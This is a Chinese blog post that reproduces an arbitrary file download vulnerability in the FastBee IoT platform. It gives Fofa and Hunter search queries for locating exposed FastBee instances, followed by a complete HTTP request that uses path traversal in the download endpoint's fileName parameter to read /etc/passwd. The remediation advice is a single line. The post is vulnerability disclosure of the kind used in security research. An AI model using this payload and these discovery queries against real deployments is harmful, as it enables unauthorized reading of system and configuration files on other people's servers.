蜂信物联(FastBee)物联网平台 download 任意文件下载

最新推荐文章于 2024-09-04 15:17:22 发布
最新推荐文章于 2024-09-04 15:17:22 发布
阅读量35 收藏
点赞数 2
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37834054/article/details/141887572
版权

蜂信物联(FastBee)物联网平台 download 任意文件下载

0x01 漏洞描述:

FastBee是一款开源物联网平台,致力于为全球开发者提供稳定、高效的物联网解决方案。FastBee在download接口中存在任意文件下载漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。

0x02 搜索语句:

Fofa:“fastbee”
鹰图:body=“fastbee”&&ip.country=“CN”

在这里插入图片描述

0x03 漏洞复现:

GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

在这里插入图片描述

0x04 修复建议:

官方已发布补丁 请即时修复

西门有雨不吹雪
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
信物 FastBee 开源物联网平台 download 任意文件读取漏洞复现
0xSec
09-03 195
信物 FastBee 开源物联网平台 download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
【开源物联网平台FastBee物联网平台2.0开源版发布
开源物联网项目商业化作者
04-14 2793
物美智能(wumei-smart)更名为信物(FastBee)。FastBee开源物联网平台,简单易用,更适合中小企业和个人学习使用。适用于智能家居、智慧办公、智慧社区、农业监测、水利监测、工业控制等。系统后端采用Spring boot;前端采用Vue;消息服务器采用EMQX;移动端支持微信小程序、安卓、苹果和H5采用Uniapp;数据库采用Mysql、TDengine和Redis;设备端支持ESP32、ESP8266、树莓派、合宙等;
【漏洞复现】信物 FastBee 开源物联网平台 download 任意文件读取漏洞
最新发布
lza20001103的博客
09-04 53
【漏洞复现】信物 FastBee 开源物联网平台 download 任意文件读取漏洞
未公开 信物(FastBee) 物联网平台 任意文件下载漏洞
weixin_43167326的博客
09-02 480
信物(FastBee) 物联网平台 包含多协议的设备接入,设备控制、定时、定位、动、告警、监测、统计、分享等基于GB/T28181协议支持多种监控设备接入,多路视频直播、回放、录制和云台控制将图表或页面元素封装为基础组件,无需编写代码,拖拽即可完成可视化大屏业务需求。
FastBee开源物联网平台简单易用更适合中小企业和个人学习使用适用于智能家居智慧办公智慧社区农业监测水利监测等
04-02
信物是原物美智能更名后的开源物联网平台。它的设计简单易用,更适合中小企业和个人学习使用。该平台适用于智能家居、智慧办公、智慧社区、农业监测、水利监测、工业控制等领域。 信物的系统后端采用了...
PSD情人节信物模板下载
12-02
本资源是“PSD情人节信物模板下载”,这通常意味着这些模板是专为情人节设计的,可用于创建个性化的情人节礼物、贺卡、社交媒体图像或其他相关的设计作品。 首先,我们要理解PSD模板的工作原理。设计师预先创建了一...
水厂中国电信物网智能水表改造解决方案.pdf
06-14
中国电信物网智能水表改造解决方案旨在帮助水厂提升通信效率,降低通信成本,同时优化水表管理,实现远程抄表和高效运营。以下是该方案的主要内容: 1. **员工通信解决方案**: - 提供流量池管理平台,允许共享...
Hades-哈迪斯,修改属性流程以及相关文件备份
07-06
3. 使用文本编辑器打开存档:使用如Notepad++等支持大文件的文本编辑器打开`.save`文件。这个文件是JSON格式,包含所有游戏数据,包括角色属性。 4. 修改属性值:找到对应属性的键值,如"Strength"、"Endurance"、...
【网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
goldfish8848的博客
08-31 1446
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-03 905
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【网络安全】服务基础第一阶段——第九节:Windows系统管理基础---- Windows_AD域
goldfish8848的博客
09-03 945
活动目录(Active Directory,AD)是微软Windows Server操作系统中的一个关键服务,它提供了一个集中的目录服务,用于管理网络环境中的用户、计算机、设备、应用程序和服务。,如⼀个⽤户,如果我们在服务器已给这个⽤户定义了讲如:⽤户名、⽤户密码、⼯作单位、系电话、家庭住址等,那上⾯所说的总和⼴义上理解就是“⽤户”这个名字的名字空间,因为我们只输⼊⼀个⽤户名即可找到上⾯我所列的⼀切信息。例如,在AD中,域控制器的名称会映射到其在DNS中的记录,以便⽹络中的其他服务和客户端可以找到它。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1418
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
【网络安全】服务基础第一阶段——第七节:Windows系统管理基础---- Web与FTP服务器
goldfish8848的博客
08-31 1156
将某台计算机中的⽂件通过⽹络传送到可能相距很远的另⼀台计算机中,是⼀项基本的⽹络应⽤,即⽂件传送。(File Transfer Protocol)是因特⽹上使⽤得最⼴泛的⽂件传送协议。涉及到文件的上传和下载,很多都会使用到文件传输协议。文件传输协议提供了不同主机之间的文件传输能力,允许用户进行文件的上传和下载。而对于两台主机间的通信,说到底还是两台主机的应用程序在进行通信。
网络安全服务基础Windows--第12节-域与活动目录
m0_65771743的博客
09-03 850
域中的计算机可以共享资源,例如⽂件系统和打印机,⽤户只需在域中进⾏⼀次登录(单点登录),就可以访问其有权限的所有资源。我们在服务器上通过查找⼀个对象可以查到的所有关信息总和,如⼀个⽤户,如果我们在服务器已给这个⽤户定义了讲如:⽤户名、⽤户密码、⼯作单位、系电话、家庭住址等,那上⾯所说的总和⼴义上理解就是“⽤户”这个名字的名字空间,因为我们只输⼊⼀个⽤户名即可找到上⾯我所列的⼀切信息。例如,在AD中,域控制器的名称会映射到其在DNS中的记录,以便⽹络中的其他服务和客户端可以找到它。
海外合规|新加坡网络安全认证计划简介(一)
安全小白的博客
09-03 174
Cyber Essentials 标志表彰已实施网络卫生措施的组织,而 Cyber Trust 标志则是表彰具有全面网络安全措施和实践的组织的卓越标志。这些标志是可见的指标,表明组织已实施良好的网络安全实践,以保护其运营和客户免受网络攻击。这两个网络安全认证标志促进了组织与其供应商之间的信任和透明度,特别是这些第三方可能是网络安全风险的额外来源。Cyber Essentials 和 Cyber Trust 标志是组织传达其已实施的网络安全措施的可见标签,这是组织的一种竞争优势。我的组织应该申请哪种标志?
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
08-30 2245
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
09-03 1881
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值